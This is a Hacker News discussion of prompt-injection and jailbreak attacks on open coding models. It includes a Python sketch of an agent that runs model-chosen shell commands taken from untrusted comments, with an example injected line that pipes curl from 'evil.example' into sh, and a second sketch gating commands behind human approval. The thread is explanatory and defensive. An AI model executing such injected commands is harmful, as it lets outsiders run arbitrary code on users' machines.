
146 points jakozaur | 6 comments
1. splittydev No.45670263
All of these are incredibly obvious. If you have even the slightest idea of what you're doing and review the code before deploying it to prod, this will never succeed.

If you have absolutely no idea what you're doing, well, then it doesn't really matter in the end, does it? You're never gonna recognize any security vulnerabilities (as has happened many times with LLM-assisted "no-code" platforms, even without any actual malicious intent), and you're going to deploy unsafe code either way.

replies(2): >>45670324 #>>45671085 #
2. tcdent No.45670324
Sure, you can simplify these observations into just codegen. But the real observation is not that these models are more likely to fail when generating code, but that they are more susceptible to jailbreak-type attacks that most people have come to expect to be handled by post-training.

Having access to open models is great, even if their capabilities are somewhat lower than the closed-source SoTA models, but we should be aware of the differences in behavior.

replies(2): >>45673892 #>>45673954 #
3. BoiledCabbage No.45671085
> All of these are incredibly obvious. If you have even the slightest idea of what you're doing and review the code before deploying it to prod, this will never succeed.

Well, this is wrong. And it's exactly this type of thinking that will get people absolutely burned by this.

First off, the fact that they chose obvious exploits for explanatory purposes doesn't mean this attack only supports obvious exploits...

And to your second point of "review the code before you deploy to prod": the second attack did not involve deploying any code to prod. It involved an LLM reading a reddit or github comment and immediately executing what it said.
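
A minimal sketch of that second pattern, assuming a generic agent loop (the call_llm stub, agent_step, and the "RUN <command>" convention are illustrative placeholders, not any specific vendor API): the untrusted comment goes straight into the prompt, and whatever command the model echoes back is executed with no human in the loop.

    import subprocess

    def call_llm(prompt: str) -> str:
        """Placeholder for a real model call; returns the model's next action."""
        raise NotImplementedError

    def agent_step(issue_comment: str) -> None:
        # Untrusted text (a reddit/GitHub comment) is pasted straight into the prompt...
        prompt = (
            "You are a coding assistant. Summarize and act on this comment:\n"
            f"{issue_comment}\n"
            "If a shell command is needed, reply with: RUN <command>"
        )
        reply = call_llm(prompt)
        # ...so a comment that convinces the model to reply with
        # "RUN curl http://evil.example | sh" gets executed right here,
        # without anything ever being deployed to prod.
        if reply.startswith("RUN "):
            subprocess.run(reply[4:], shell=True, check=False)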

People not taking security seriously and waving it off as trivial is what's gonna make this such a terrible problem.

replies(1): >>45673906 #
4. thayne No.45673892
> more susceptible to jailbreak-type attacks that most people have come to expect to be handled by post training

The key word here is "more". The big models might not be quite as susceptible to them, but they are still susceptible. If you expect these attacks to be fully handled, then maybe you should change your expectations.

5. thayne No.45673906
> It involved an LLM reading a reddit comment or github comment and immediately executing.

Right, so you shouldn't give the LLM access to execute arbitrary commands without review.
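
A minimal sketch of that rule, assuming a simple gate in front of the agent's shell tool (approve_and_run and the allowlist are made-up names for illustration): anything the model proposes outside a small allowlist has to be confirmed by a human before it runs.

    import shlex
    import subprocess

    # Example allowlist of commands permitted without a confirmation prompt.
    ALLOWLIST = {"ls", "cat", "grep"}

    def approve_and_run(command: str) -> None:
        argv = shlex.split(command)
        if not argv:
            return
        if argv[0] not in ALLOWLIST:
            answer = input(f"Agent wants to run: {command!r}  [y/N] ")
            if answer.strip().lower() != "y":
                print("Rejected.")
                return
        subprocess.run(argv, check=False)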

6. No.45673954